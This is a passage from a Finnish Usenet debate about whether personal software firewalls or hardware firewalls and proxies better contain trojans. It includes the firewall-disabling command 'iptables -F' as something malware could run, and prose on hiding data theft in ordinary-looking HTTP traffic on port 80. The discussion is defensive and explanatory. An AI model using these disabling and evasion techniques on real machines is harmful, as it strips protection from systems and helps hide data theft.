haittaohjelma jonka toiminta on tuntematon, se on jo sinänsä vakava
uhka koneen tietoturvalle. Käyttöjärjestelmän tietoturva murtuu aina
helpommin sisältä kuin ulkoa päin, joten haittaohjelmat on syytä pitää
ulkopuolella.
Jos haittaohjelma onnistuu murtamaan/huijaamaan itselleen
ylläpitäjän oikeudet, samassa koneessa pyörivä softapalomuuri on aina
mahdollista sammuttaa tai ohittaa. Ylläpitäjän oikeuksilla toimiva
haittaohjelma voi vaikkapa käskeä käyttöjärjestelmää poistamaan
verkkoajuripinostaan ne erilliset osat joita se ei erityisesti
tunnista, jolloin palomuuriohjelmien tekemät lisätarkistukset häviävät
sen sileän tien... tai asentaa oman ohituskomponentin ajuripinoon
ennen palomuurikomponenttia. Aivan yhtä helppoa on ajaa Linuxissa komento
"iptables -F" tai sitä vastaava systeemikutsu. Tämän jälkeen kone
onkin täysin suojaton, ja haittaohjelma pääsee tekemään aivan mitä
huvittaa.
Rautapalomuurin kanssa asia on toisin: koska rautapalomuuri on
erillinen laite, ylläpitäjän oikeudet käyttäjän koneessa eivät auta
sen ohitukseen. Vaikka haittaohjelma vaihtaisi koko käyttöjärjestelmän
ytimen omaan versioonsa, rautapalomuuri rajoittaa edelleen sen
yhteyksiä ulkomaailmaan. (Huomaa: rajoittaa, ei estä. Täysi estäminen
vaatisi kaiken verkkoliikenteen katkaisua.) Lisäksi tällaisessa
tilanteessa rautapalomuurin lokeihin voi jäädä jälkiä siitä mihin
tietoa on liikkunut. Rautapalomuurista on siis hyötyä senkin jälkeen
kun koneen omat turvajärjestelyt ovat jo pettäneet, softapalomuurissa
kaikki on viime kädessä koneen oman käyttöjärjestelmän tietoturvan varassa.
> Kun haittaohjelma pääsee vapaasti nettiin minkään "oikean rautapalomuurin"
> kykenemättä sitä mitenkään estämään...se voi lähettää kaapatut tiedot
> minne tahansa, kenelle tahansa ja miten usein tahansa. Tietysti järkevä
> haittaohjelma lähettää tietoja vain silloin kun käyttäjä on
> koneellaan ja tekee jotain jotta ei tule mitään "mutta miks mun
> hubi/nettiyhteys muka on toiminnassa vaikka mää istun huusissa" juttuja.
Käyttöjärjestelmän tasolla on yleisesti ottaen kohtuullisen helppoa
estää jotakin ohjelmaa pääsemästä verkkoon. Seuraava askel on se, että
haittaohjelma käyttää nettiin päästäkseen apunaan jotakin toista
ohjelmaa, jonka kuuluu luonnostaan päästä verkkoon. Jotta tämä saadaan
estetyksi, pitäisi estää/rajoittaa ohjelmien välinen kommunikaatiota ja
uusien ohjelmien käynnistämistä toisten ohjelmien sisältä. Tämä on
paljon vaikeampaa.
En ole Windows-asiantuntija, mutta käsittääkseni Windowsin DDE
(Dynamic Data Exchange)-toiminnallisuuden täydellinen estäminen
rikkoisi *paljon* asioita eri sovelluksissa ja joitakin asioita jopa
käyttöjärjestelmän omassa käyttöliittymässä. Valikoiva rajoittaminen
(siten että kaikki sallitut toimenpiteet hyväksytetään ylläpitäjällä
joko etukäteen tai reaaliaikaisesti) taas toisi suuren määrän lisätyötä.
On olemassa käyttöjärjestelmiä joissa turvallisuusajattelu on
pidemmällä, mutta tällaiset käyttöjärjestelmät vaativat
käyttäjää/ylläpitäjää oikeasti ajattelemaan kaikkien toimenpiteittensä
turvallisuusaspekteja. Suurempi ajattelun tarve ei nykyisin jostain
syystä lisää käyttöjärjestelmän suosiota :-/
Tuntemiani ovat HP:n VirtualVault-käyttöjärjestelmä
(Unix-johdannainen) sekä HP:n SecureOS/Linux (VirtualVault-tyyppisillä
toiminnoilla laajennettu Linux). Näitä ylläpitäessä huomaa äkkiä
kuinka tavallisissa käyttöjärjestelmissä kaikki on sallittua ja toimii
heti automaattisesti: näissä se ei olekaan aina itsestään selvää.
Väärin konfiguroimalla näistäkin saa turvattomia.
Anssi Saari
> SEN SIJAAN...jos koneessa olisi loistava henkilökohtainen palomuuri, kuten
> vaikkapa ZoneAlarm, se hälyttäisi heti että outo ohjelma pyrkii nettiin (eikä
> päästäisi ilman erillistä lupaa sitä menemään).
Minua kiinnostaa se onko mahdollista tietää mikä on outo ohjelma ja
mikä ei? Siis onko vinkkareissa ehdottoman luotettava menetelmä sen
tunnistamiseksi että prosessi x:n koodi on tiedostossa z ja käyttääkö
palomuurit sitä? Käyttiksen ydin asian varmaan tietää, mutta pääseekö
siihen tietoon käsiksi muualta, tässä tapauksessa palomuurista?
Markus Jansson
> Minua kiinnostaa se onko mahdollista tietää mikä on outo ohjelma ja
> mikä ei?
No selain ei ole. Eikä SSH. Muille ohjelmille ei tarvitse antaa lupaa päästä
ulos.
> Siis onko vinkkareissa ehdottoman luotettava menetelmä sen
> tunnistamiseksi että prosessi x:n koodi on tiedostossa z ja käyttääkö
> palomuurit sitä? Käyttiksen ydin asian varmaan tietää, mutta pääseekö
> siihen tietoon käsiksi muualta, tässä tapauksessa palomuurista?
ZoneAlarm palomuuri tekee checksumit ohjelmista sekä uusin versio .dll
niiden käyttämistä .dll tiedostoista, eli se tosiaan katsoo että ohjelma on SE
ohjelma jolla on lupa päästä nettiin. Tiedoston muuttaminen tai korvaaminen
toisella tarkoittaa että se ei pääse nettiin.
Markus Jansson
> In article <1104_10...@news.utu.fi>, Markus Jansson wrote:
> iptables -A INET-ULOS -d spy.ware.palvelin.microsoft.com -j DROP
> Tuolla estetään kaikki liikenne palvelimelle, voitaisiin toki määritellä
> tarkemminkin, jos vaikka olisi jotain muuta asiaa tuonne. Tavallisesti
> tuskin on mitään aisaa kuitenkaan palvelimelle, joka kerää spy-warea tms.
HUAH!
LUE MITÄ KIRJOITETAAN!
Mistä tiedät mikä palvelin on hakkerin käyttämä palvelin? HÄH? Mistä? Et
mistään.
> Jospa otat hieman selvää asioista ennenkuin kerrot mitä oikeilla
> palomuureilla voidaan tehdä ja mitä ei voida tehdä.
Seliseli. Kerro minulle mistä tiedät mille palvelimelle yhteydet pitää kieltää ja
mille ei?!?!?!?! Tätä olen jo kysynyt mutta vastausta ei tullut.
Jos minä perustan palvelimen osoitteeseen kivapalvelin.omapalvelin.com ja
laitan troijalaiset ottamaan sinne yhteyttä portin80 kautta niin mistä sinä
tiedät laittaa palomuurit blokkaamaan kaikki yhteydet osoitteeseen
omapalvelin.com ?!?!?!
> Se voidaan poistaa, jos se sattuu olemaan yksittäinen ohjelma, mutta
> entäs se kaikki Windows-ohjelmiin sisäänrakennettu paska. Ja toisaalta,
> jos se tiedosto on kerran päässyt koneelle, niin miksi se ei voisi päästä
> toista kertaa sinne?
Aivan. Siksi siihen ei voi koskaan luottaa täysin että koneet olisivat puhtaina
paskasta.
> Jos nyt puhutaan tuosta äsken mainitsemastasi kuvittellisesta yrityksestä,
> niin kerroppa missä yrityksessä tehdään hommat niin päin persettä että
> käyttäjä voi asentaa itse ohjelmia koneelle, ja vieläpä testaamattomia
> ohjelmia. Ja missä tallennetaan mitään muita salasanoja koneella kuin
> iltalehden www-version tunnukset.
Vaikka missä. Kaikkialla missä minä olen tietokoneita käyttänyt. Kouluilla,
sairaaloissa, jokusessa yrityksissä jne. jne.
Winkussa ei oikein ole sellaista että voisi kieltää suorittamasta .exe
tiedostoja.
> Noh, enivei, kuten jo kerroin ja osoitin palomuurin voi konfiguroida niin,
> että estetään johonkin tiettyy ip:hen lähtevät yhteydet. Firmoissa lienee
> melko yleistä, että palomuurin yhteydessä on myös läpinäkyvä
> proxy-palvelin, jonka läpi liikenne pakotetaan.
Joojoo...mutta et kertonut mistä sinä jumalallisessa viisaudessa osaat estää
pääsyn juuri hakkerin palvelimelle kun et tiedä mikä se on?
> Jopa rakkaassa Windowsissasi taitaa olla käsky netstat, se kertoo mistä
> portista ja mihin porttiin/ip:hen ollaan yhteydessä ja missä tilassa
> protokolla on. Hienostuneempiakin tapoja analysoida ohjelman tuottamaa
> liikennettä toki on, mutta tuokin kertoo kaiken tarvittavan sen
> estämiseen.
Eikä kerro. Käyttäjä voi olla vaikka surffaamassa netissä. Ei troijalaisen
tarvitse kokoajan pitää yhteyttä auki. Se voi vaikka odottaa kunnes selain
tms. käynnistetään ja sitten, vaikka kerran päivässä, avata yhteyden porttiin
80 omapalvelin.com ja lähettää kaappaamansa tiedot sinne. Aikaa kuluu
jokunen sekunti.
> Koska palomuurin tehtävä ei ole tarkkailla ajettavia ohjelmia tuo on
> mielestäni hyödytöntä, samaten ylläpitäjän juoksuttaminen. Jos haluan
> todellista suojaa koneeni menee nettiin proxy/firewall yhdistelmän läpi,
> joka ei sijaitse samalla koneella. Tuolla saavutetaan se suoja, mitä sinä
> luulet saavuttavasi ZAP:illa. Ja tuo tarkoittamani firewall on osa
> kerneliä, eikä jokin kernelin ulkopuolinen ohjelma, joka voidaan
> loppupeleissä ohittaa/sammuttaa.
Jos se proxy/firewall ei sijaitse samalla koneella, niin selitä minulle mistä se
tietää että nettiin portista 80 on menossa troijalainen eikä vaikka
webbiselain? Mistä se tietää mitä ohjelmia varsinaisella koneellasi SINÄ
suoritat ja mitä troijalainen?
> Kyllä, se ZAP voidaan todellakin sammuttaa, johtuen siitä että se on vain
> yksi prosessi. Siinä voi olla joitakin lukituksia, suojauksia taikka mitä
> tahansa, mutta se ei muuta sitä faktaa että se on prosessi jota ydin pitää
> käynnissä, ja jonka se voi myös sammuttaa. Eikä tarvitse edes salasanaa.
Väärin. Prosessin kautta ainoastaan hallitaan, jos nyt oikein osaan
suomentaa ja selittää, matalan tason ajureita jotka määräävät mitä
tapahtuu. Jos sammutat prosessin...siitä vaan, ei mitään merkitystä muuta
kuin että sitten et voi palomuurisääntöjä muuttaa mitenkään eli et voi
uudella ohjelmalla päästä läpi.
Markus Jansson
> asennetut ohjelmat ovat tiedetysti turvalliset (parhaan
> asennushetkellä saatavissa olevan tiedon mukaan). Sitten varmistetaan
> että haittaohjelmia ei tule mistään sisään: tämä tarkoittaa sitä että
> peruskäyttäjällä ei ole oikeutta asentaa ohjelmia eikä mahdollisuutta
> ohittaa virustarkistusta. Äärimmillään peruskäyttäjien koneista
> otetaan korppuasemat ja CD-asemat irti ja kotelot lukitaan, mutta
> yleensä näin pitkälle ei tarvitse mennä kunhan käyttäjät pannaan
> allekirjoittamaan sopivansisältöinen tietoturvasitoumus.
Aivan, aivan! Mutta jos tietokoneiden asetukset jne. ovat kunnossa, ei
periaatteessa tarvita rautapalomuuriakaan. Jos koneet kommunikoivat
firman verkossa luotettavalla tavalla salaten viestinnän eikä niissä ole
heikkoja salasanoja tai epäluotettavia palveluita niin ei kukaan niihin pääse
toiselta puolen maailmaa sisään.
> Kaikki liikenne sisäverkon ulkopuolelle pannaan kulkemaan sopivan
> proxyn kautta. Näin tehdään haittaohjelmien toiminta hankalammaksi:
> ulospäin porttiin 80 suuntautuvan liikenteen on oltava ainakin
> muodollisesti HTTP:n näköistä. Jos lisäksi tarkistetaan että
> lähetettävä hakupyyntö ei ole ylipitkä (yli kilotavun mittainen HTTP
> GET-komento haisee jo aika pahalle) ja estetään kokonaan pääsy
> tunnettuihin haittaohjelmien yhteydenottokohteisiin, haittaohjelmien
> toiminta on jo aika vaikeaa... sitäpaitsi, haittaohjelman olisi
> ensiksi päästävä sisäverkkoon. Jos proxy suodattaa pois
> ActiveX-komponentit ja muut tietoturvallisesti epäilyttävät
> datamuodot, haittaohjelman mahdollisuudet päästä käynnistymään
> sisäverkon koneessa ovat aika pienet.
Haittaohjelma voidaan laittaa lähettämään tiedot vaikka käyttämällä
"lomakkeen täyttöä" jollakin webbisivulla jolloin kaikki näyttää olevan ok.
> Jos haittaohjelma onnistuu murtamaan/huijaamaan itselleen
> ylläpitäjän oikeudet, samassa koneessa pyörivä softapalomuuri on aina
> mahdollista sammuttaa tai ohittaa. Ylläpitäjän oikeuksilla toimiva
> haittaohjelma voi vaikkapa käskeä käyttöjärjestelmää poistamaan
> verkkoajuripinostaan ne erilliset osat joita se ei erityisesti
> tunnista, jolloin palomuuriohjelmien tekemät lisätarkistukset häviävät
> sen sileän tien... tai asentaa oman ohituskomponentin ajuripinoon
> ennen palomuurikomponenttia. Aivan yhtä helppoa on ajaa Linuxissa
> komento"iptables -F" tai sitä vastaava systeemikutsu. Tämän jälkeen kone
> onkin täysin suojaton, ja haittaohjelma pääsee tekemään aivan mitä
> huvittaa.
Totta, totta. Mutta jos oletetaan että adminiksi ei pääse vaan ainoastaan
tavalliseksi käyttäjäksi. Tavallinen käyttäjä voi laukaista troijalaisen joka
menee portista 80 ulos hakkerin palvelimeen jos henkilökohtaista
palomuuria ei ole koneessa. Jos on, se ei onnistu.
Eli paikallisesti järjestelmänvalvojan oikeuksia ei tarvita ohittamaan
rautapalomuuri. Mutta softapalomuurin ohittamiseen ne tarvitaan.
> Rautapalomuurin kanssa asia on toisin: koska rautapalomuuri on
> erillinen laite, ylläpitäjän oikeudet käyttäjän koneessa eivät auta
> sen ohitukseen. Vaikka haittaohjelma vaihtaisi koko käyttöjärjestelmän
> ytimen omaan versioonsa, rautapalomuuri rajoittaa edelleen sen
> yhteyksiä ulkomaailmaan. (Huomaa: rajoittaa, ei estä. Täysi estäminen
> vaatisi kaiken verkkoliikenteen katkaisua.) Lisäksi tällaisessa
> tilanteessa rautapalomuurin lokeihin voi jäädä jälkiä siitä mihin
> tietoa on liikkunut. Rautapalomuurista on siis hyötyä senkin jälkeen
> kun koneen omat turvajärjestelyt ovat jo pettäneet, softapalomuurissa
> kaikki on viime kädessä koneen oman käyttöjärjestelmän tietoturvan
> varassa.
Rautapalomuurista on periaatteessa *ainoastaan* se hyöty että koneita ei
voi ohjailla tai niihin ottaa vapaasti yhteyttä ulkopuolelta jos sisäänpäin
tulevat portit on blokattu ja kone verkon sisällä vaarantunut. Ulospäin
menevää liikennettähän se ei kykene rajoittamaan esim. portista 80 jos ei
webbisurffailua kielletä kokonaan.
Markus Jansson
wrote:
> Tai tarkkaillaan silmä kovana, että koneissa on asennettuna vain
> turvalliseksi kohtuullisella varmuudella tiedettyjä ohjelmia, eikä
> uusia voi kuka tahansa random - ihminen asentaa triviaalisti?
Itse asiassa ihmettelen, miksei esim. Windowsissa ole jotakin "lockdown"
tyyppistä komentoa. Siis sellaista jolla admin voi "lukita" koneen niin että
MITÄÄN muuta kuin siellä NYT olevia ohjelmia ei voi suorittaa. Eli kaikki .exe
scr .bat .com .wsh jne. olisivat kiellettyjä paitsi ne jotka koneessa sillä
hetkellä sisällä ovat. Tietysti NYT olevista ohjelmista pitäisi olla hash
laskettuna jottei saman nimisiä ohjelmia voi suorittaa ja siten kiertää tätä
systeemiä.
Ei luulisi olevan vaikeata toteuttaa. Kun kerran asetukset saa lukittua jotta
torvelot käyttäjät eivät pääse niitä soheltamaan niin miksi ohjelmia ei saa
lukittua? Ehkäisisi periaatteessa erittäin tehokkaasti kaikkia viruksia,
troijalaisia tms. laukeamasta koneessa!
Jokaisesta suorituskelpoisesta ohjelmasta ja komponentista md5 arvo
talteen turvattuun tietokantaan ja mitään muuta kuin saman md5 arvon
sisältäviä komponentteja ja ohjelmia ei saisi suorittaa. End of game.
Sauli Luoto
Ei, se ns. luotettavien ohjelmien tunnistus tapahtuu luultavasti pelkän
tiedostonimen perusteella, tai jos se on tehty järkevästi niin ohjelmasta
lasketaan myös jokin tarkistussumma, jotta voidaan olla varmoja, ettei se
ole muuttunut.
Oli miten oli, kun ohjelmalle on kerran antanut luvan liikennöidä se voi
lähettää mitä tahansa dataa, jollei yhteys kulje proxy/palomuurin kautta
ja jos kulkee, niin se kaikki hyöty taas tavoitetaan siinä proxy/palomuurissa,
ei henkilökohtaisessa palomuurissa, joita yleisesti (poislukien Jansson)
pidetäänkin ns. snake oil:ina.
Eli siis vain luotetaan, että mitään haitallista ei lähetetä. Mikä ei ole
mitenkään yksisilmäistä, onhan Microsoft osoittanut useasti olevansa
luottamuksen arvoinen :)
Sauli Luoto
> On 14 Jun 2002 03:11:36 GMT, slu...@maa1.cc.lut.fi (Sauli Luoto) wrote:
>> In article <1104_10...@news.utu.fi>, Markus Jansson wrote:
>> iptables -A INET-ULOS -d spy.ware.palvelin.microsoft.com -j DROP
>> Tuolla estetään kaikki liikenne palvelimelle, voitaisiin toki määritellä
>> tarkemminkin, jos vaikka olisi jotain muuta asiaa tuonne. Tavallisesti
>> tuskin on mitään aisaa kuitenkaan palvelimelle, joka kerää spy-warea tms.
> HUAH!
> LUE MITÄ KIRJOITETAAN!
> Mistä tiedät mikä palvelin on hakkerin käyttämä palvelin? HÄH? Mistä? Et
> mistään.
Oletetaanpa vaikka, että käyttäisin jotain Kazaa:n tyyppistä ohjelmaa,
joka sisältää myös ominaisuuksia, joista en niin välitä. Voin estää
yhteydenotot säännöillä. Jos taas haluaa olla ensimmäisessä rintamassa,
eikä elää muiden raporttien varassa enkä viitsi itse selvittää mitä
asentamani ohjelma oikeasti tekee, niin nettiin mennään proxy-muurin läpi.
> Jos minä perustan palvelimen osoitteeseen kivapalvelin.omapalvelin.com ja
> laitan troijalaiset ottamaan sinne yhteyttä portin80 kautta niin mistä sinä
> tiedät laittaa palomuurit blokkaamaan kaikki yhteydet osoitteeseen
> omapalvelin.com ?!?!?!
Kun liikenne kulkee proxy-muurin läpi, niin http-pyynnöt ohjataan proxylle
joka tekee pyynnön lopulliselle palvelimelle, jos se ei riko suodatus-sääntöjä.
Jos proxylle lähtee vaikkapa "GET / HTTP/1.0" se hakee palvelimeltasi
index.html:n, tai mikä nyt onkaan juuri-dokumentti ja se ohjataan
asiakaskoneelle. Jos proxylle lähtee jotakin, joka rikkoo http-protokollaa
ei sitä suoriteta eikä se näin ollen pääse edes varsinaiseen
pakettifiltteröinti-osaan.
>> Se voidaan poistaa, jos se sattuu olemaan yksittäinen ohjelma, mutta
>> entäs se kaikki Windows-ohjelmiin sisäänrakennettu paska. Ja toisaalta,
>> jos se tiedosto on kerran päässyt koneelle, niin miksi se ei voisi päästä
>> toista kertaa sinne?
> Aivan. Siksi siihen ei voi koskaan luottaa täysin että koneet olisivat puhtaina
> paskasta.
Niin, eli mistä tiedät mitä tietoa ohjelmasi lähettää nettiin, kun se on
sallittujen listalla?
> Vaikka missä. Kaikkialla missä minä olen tietokoneita käyttänyt. Kouluilla,
> sairaaloissa, jokusessa yrityksissä jne. jne.
> Winkussa ei oikein ole sellaista että voisi kieltää suorittamasta .exe
> tiedostoja.
Taas on varmasti bugiraportin paikka, kyllä NTFS:ssä ainakin viimeksi oli
mahdollisuudet säätää tiedosto-oikeuksia.
>> Jopa rakkaassa Windowsissasi taitaa olla käsky netstat, se kertoo mistä
>> portista ja mihin porttiin/ip:hen ollaan yhteydessä ja missä tilassa
>> protokolla on. Hienostuneempiakin tapoja analysoida ohjelman tuottamaa
>> liikennettä toki on, mutta tuokin kertoo kaiken tarvittavan sen
>> estämiseen.
> Eikä kerro. Käyttäjä voi olla vaikka surffaamassa netissä. Ei troijalaisen
> tarvitse kokoajan pitää yhteyttä auki. Se voi vaikka odottaa kunnes selain
> tms. käynnistetään ja sitten, vaikka kerran päivässä, avata yhteyden porttiin
> 80 omapalvelin.com ja lähettää kaappaamansa tiedot sinne. Aikaa kuluu
> jokunen sekunti.
Netstat kertoo täsmälleen tuon mitä sanooin, älä jankuta turhasta vaan ota
selvää.
Nyt puhuttiin siitä ohjelman analysoinnista, jossainpäin on jopa ollut
tapana katsoa mitä ohjelma tekee, ennenkuin sitä asennetaan jokaiseen
firman tuotantokäytössä olevaan koneeseen. Voidaan vaikka käyttää
ohjelmaan yhdellä koneella vaikka kuukausi, samalla kun tcpdump tekee
logia kaikesta liikenteestä, joka sitten tutkitaan ennen käyttöönottoa.
Siitä nähdää josko ohjelma yrittää jotain asiatonta ja estetään se, jos
softa on silti välttämätön.
> Jos se proxy/firewall ei sijaitse samalla koneella, niin selitä minulle mistä se
> tietää että nettiin portista 80 on menossa troijalainen eikä vaikka
> webbiselain? Mistä se tietää mitä ohjelmia varsinaisella koneellasi SINÄ
> suoritat ja mitä troijalainen?
Koska webbi-selain juttelee http-protokollaa, ja troijalainen luultavasti ei.
> Väärin. Prosessin kautta ainoastaan hallitaan, jos nyt oikein osaan
> suomentaa ja selittää, matalan tason ajureita jotka määräävät mitä
> tapahtuu. Jos sammutat prosessin...siitä vaan, ei mitään merkitystä muuta
> kuin että sitten et voi palomuurisääntöjä muuttaa mitenkään eli et voi
> uudella ohjelmalla päästä läpi.
Noin olisi, jos se palomuuri olisi osa kerneliä. Vaan kun ei ole. Jos sen
ZAP:n voi jotenkin sammuttaa, niin sen sammutuksen tekee ydin. Ja jos se
ZAP-ajuri ei ole osa ydintä myös sekin voidaan sammuttaa, on vain ajan
kysymys koska joku hoksaa miten se tapahtuu.
Sauli Luoto
> Haittaohjelma voidaan laittaa lähettämään tiedot vaikka käyttämällä
> "lomakkeen täyttöä" jollakin webbisivulla jolloin kaikki näyttää olevan ok.
Tottakai, mutta tätä ei voi estää edes henkilökohtaisella muurilla. Hieman
sitä pystyy rajoittamaan proxyllä, jos GET:ille tai POST:ille määrittää
jonkun rajan.
Markus Jansson
> Ei, se ns. luotettavien ohjelmien tunnistus tapahtuu luultavasti pelkän
> tiedostonimen perusteella, tai jos se on tehty järkevästi niin ohjelmasta
> lasketaan myös jokin tarkistussumma, jotta voidaan olla varmoja, ettei se
> ole muuttunut.
ZoneAlarm tekee tarkistussumman sekä ohjelmasta itsestään että uusin
Pro versio myös ko. ohjelmien käyttämistä .dll tiedostoista.
> Oli miten oli, kun ohjelmalle on kerran antanut luvan liikennöidä se voi
> lähettää mitä tahansa dataa, jollei yhteys kulje proxy/palomuurin kautta
> ja jos kulkee, niin se kaikki hyöty taas tavoitetaan siinä proxy/palomuurissa,
> ei henkilökohtaisessa palomuurissa, joita yleisesti (poislukien Jansson)
> pidetäänkin ns. snake oil:ina.
EIEIEIEIEI!!!
Mikä helvetin "kaikki hyöty"?!? SELITÄ NYT, MITEN PROXY/PALOMUURI
VOI TIETÄÄ MIKÄ OHJELMA ON OTTAMASSA YHTEYTTÄ JONNEKIN?
Ei mitenkään. Ei voi olla noin jumalattoman vaiketa ymmärtää!
Jos ja kun ZAP:ssa pääkäyttäjä määrittelee mitä ohjelmia saa ulos mennä
niin siihen ei voi kukaan ujuttaa mitään haittaohjelmaa menemään ulos
(paitsi pääkäyttäjä). Jos kaikille firman koneille on asennettu ZAP ja
konfiguroitu niin että ainoastaan selain saa mennä ulos niin tavalliset
käyttäjät EIVÄT PÄÄSE KIRVEELLÄKÄÄN ulos siitä koneesta muulla kuin
sillä täsmälleen yhdellä selaimella jolla on lupa mennä ulos! Hyvä niin,
KOSKA, se firman rautapalomuuri ei tiedä hevon vittua siitä MIKÄ
OHJELMA on menossa ulos, se voi vain blokata portteja ja tiettyjä IP-
osoitteita, ei siis estää troijalaisia lähettämästä tietojaan portin 80 kautta
ulos hakkerin osoitteeseen (kun kerran sitä hakkerin osoitetta ei tiedetä ja
se voi vaihtuakin jos troijalaisiin on se ohjelmoitu).
Markus Jansson
> Jos proxylle lähtee vaikkapa "GET / HTTP/1.0" se hakee palvelimeltasi
> index.html:n, tai mikä nyt onkaan juuri-dokumentti ja se ohjataan
> asiakaskoneelle. Jos proxylle lähtee jotakin, joka rikkoo http-protokollaa
> ei sitä suoriteta eikä se näin ollen pääse edes varsinaiseen
> pakettifiltteröinti-osaan.
Kuka on väittänyt että troijalainen rikkoisi http protokollaa? Kuten sanoin, se
voi vaikka "täyttää lomakkeen" jollakin sivulla tms. ole luova. Mikä tahansa
mikä mahtuu http protokollaan kelpaa tietojen lähettämiseen koneelta
nettiin.
> Niin, eli mistä tiedät mitä tietoa ohjelmasi lähettää nettiin, kun se on
> sallittujen listalla?
Selaimen ollessa kyseessä se voi lähettää vain silloin kun selain on
päästetty nettiin, kunnon admin on tietysti laittanut asetukseksi että
kysytään vielä käyttäjältä lupa (siis palomuuri kysyy) erikseen kun hän
haluaa käyttää ko. ohjelmaa. Tällöin troijalainen voisi käyttää selainta
ainoastaan silloin kun sen käyttäjäkin käyttää sitä. Tällöin taas käyttäjä kyllä
huomaa jos selain alkaa vaikkapa hakea jotakin tiettyä sivua ja täytellä
kaavakkeita tms. Tosin, en tiedä onko mahdollista edes, voimatta
hakkeroida varsinaista selainohjelmaa, tehdä sellainen ohjelmanpätkä joka
vasta selaimen käynnistyessä syöttää jotakin jollekin sivulle. Sellaisen voi
tehdä joka syöttää hetkenäX, mutta silloin käyttäjä havahtuu että mitäs
pirua, palomuurin mukaan Opera haluaa nettiin enkä mä ole sitä
käyttämässä....
Jos taas itse selaimen pääsisi uudelleenrakentamaan haluamakseen niin
sitten voisi rakennella uudestaan mitä tahansa siinä koneessa. Kunnon
asetuksilla käyttäjillä ei ole kuitenkaan oikeuksia kirjoittaa tiettyihin
hakemistoihin jne.
> Taas on varmasti bugiraportin paikka, kyllä NTFS:ssä ainakin viimeksi oli
> mahdollisuudet säätää tiedosto-oikeuksia.
Joo mutta ei estää suorittamasta .exe tiedostoja tms. Jos hemmoX saa
sähköpostiviestin liitteenä .exe tiedoston ja suorittaa sen niin hups! Se siitä.
Tähän miksi ei voi estää kommentoin tuossa toisessa viestissä hiukan,
ihmettyttää miksei käyttäjiä voi oikein Winkussa estää suorittamasta
MITÄÄN muuta kuin ennalta määriteltyjä ohjelmia. Se nimittäin pelastaisi
aika monelta ongelmalta.
> > Jos se proxy/firewall ei sijaitse samalla koneella, niin selitä minulle mistä
> > se tietää että nettiin portista 80 on menossa troijalainen eikä vaikka
> > webbiselain? Mistä se tietää mitä ohjelmia varsinaisella koneellasi SINÄ
> > suoritat ja mitä troijalainen?
>
> Koska webbi-selain juttelee http-protokollaa, ja troijalainen luultavasti ei.
Luultavasti ei. Entä jos juttelee. Homma pissii ja pahasti. Tietääkseni
sellaisia on jotka juttelevat, ainakin porttia 80 käyttää moni ja useaan voi itse
säätää mitä porttia niiden halutaan käyttävän.
> Noin olisi, jos se palomuuri olisi osa kerneliä. Vaan kun ei ole. Jos sen
> ZAP:n voi jotenkin sammuttaa, niin sen sammutuksen tekee ydin. Ja jos
> se ZAP-ajuri ei ole osa ydintä myös sekin voidaan sammuttaa, on vain ajan
> kysymys koska joku hoksaa miten se tapahtuu.
Ehkäpä. Kunnes se tapahtuu, väitän edelleen:
- Oikein asetetun ZAP:n läpi ei pääse yksikään tunnettu troijalainen
välittämään tietoa tietokoneen ulkopuolelle.
- Mikään rautapalomuuri ei voi estää troijalaista tietokoneelta lähettämästä
dataa ulos esimerkiksi portista 80 (tai muusta mikä on jätetty auki, 80 on
varmaan kaikissa auki)...ja tarkennetaan nyt sitten...jos se vain leikkii http
protokollaa.
Markus Jansson
> In article <1111_10...@news.utu.fi>, Markus Jansson wrote:
> > Haittaohjelma voidaan laittaa lähettämään tiedot vaikka käyttämällä
> > "lomakkeen täyttöä" jollakin webbisivulla jolloin kaikki näyttää olevan ok.
>
> Tottakai, mutta tätä ei voi estää edes henkilökohtaisella muurilla. Hieman
> sitä pystyy rajoittamaan proxyllä, jos GET:ille tai POST:ille määrittää
> jonkun rajan.
Täydellisesti ei. Mutta käyttäjä huomaa sen selaimen alkaessa kovasta
avaamaan uutta ikkunaa jne. jne.
Markus Jansson
<jansson...@ziplip.com> wrote:
> > > Haittaohjelma voidaan laittaa lähettämään tiedot vaikka käyttämällä
> > > "lomakkeen täyttöä" jollakin webbisivulla jolloin kaikki näyttää olevan
> > > ok.
> >
> > Tottakai, mutta tätä ei voi estää edes henkilökohtaisella muurilla.
> > Hieman sitä pystyy rajoittamaan proxyllä, jos GET:ille tai POST:ille
> > määrittää jonkun rajan.
>
> Täydellisesti ei. Mutta käyttäjä huomaa sen selaimen alkaessa kovasta
> avaamaan uutta ikkunaa jne. jne.
Lisätään vielä, että ZAP:n ollessa kyseessä se edellyttää siis ehdottomasti
että selain käynnistetään. Rautapalomuuria varten ei tarvitse käynnistää
internet selainta lainkaan työasemalta, riittää kun "jokin ohjelma" lähettää
http tyyppistä kökköä portista 80 niin läpi menee jotta singahtaa...
Ari Laitinen
> Aivan, aivan! Mutta jos tietokoneiden asetukset jne. ovat kunnossa, ei
> periaatteessa tarvita rautapalomuuriakaan. Jos koneet kommunikoivat
> firman verkossa luotettavalla tavalla salaten viestinnän eikä niissä ole
> heikkoja salasanoja tai epäluotettavia palveluita niin ei kukaan niihin
pääse
> toiselta puolen maailmaa sisään.
Rautaa tarvitaan rajalla jotta paikallisiin verkkoresursseihin ei pääse
kiinni muualta. Näitä kun ei voi rajoittaa MS:n tuotteissa kovinkaan
luontevasti muuten.
Softapalomuurin kanssa leikkiminen tulee liian kalliiksi ja on virhealtis
ratkaisu verrattuna rautaan.
Usko jo että ei kukaan ala asentamaan softapalomuureja firman kaikkiin
koneisiin ellei ole todella hyvä myyntimies myymässä.
Sauli Luoto
> On 14 Jun 2002 12:19:30 GMT, slu...@maa1.cc.lut.fi (Sauli Luoto) wrote:
>> Ei, se ns. luotettavien ohjelmien tunnistus tapahtuu luultavasti pelkän
>> tiedostonimen perusteella, tai jos se on tehty järkevästi niin ohjelmasta
>> lasketaan myös jokin tarkistussumma, jotta voidaan olla varmoja, ettei se
>> ole muuttunut.
> ZoneAlarm tekee tarkistussumman sekä ohjelmasta itsestään että uusin
> Pro versio myös ko. ohjelmien käyttämistä .dll tiedostoista.
Joka ei vaikuta mitenkään siihen mitä tietoa lähetetään tai mistä se
luetaan.
> EIEIEIEIEI!!!
> Mikä helvetin "kaikki hyöty"?!? SELITÄ NYT, MITEN PROXY/PALOMUURI
> VOI TIETÄÄ MIKÄ OHJELMA ON OTTAMASSA YHTEYTTÄ JONNEKIN?
> Ei mitenkään. Ei voi olla noin jumalattoman vaiketa ymmärtää!
Jos ei nyt ole mennyt jakeluun, että olen juuri koittanut selittää, että
sillä ei ole mitään väliä mikä ohjelma se on, kun se ohjelma ei voi
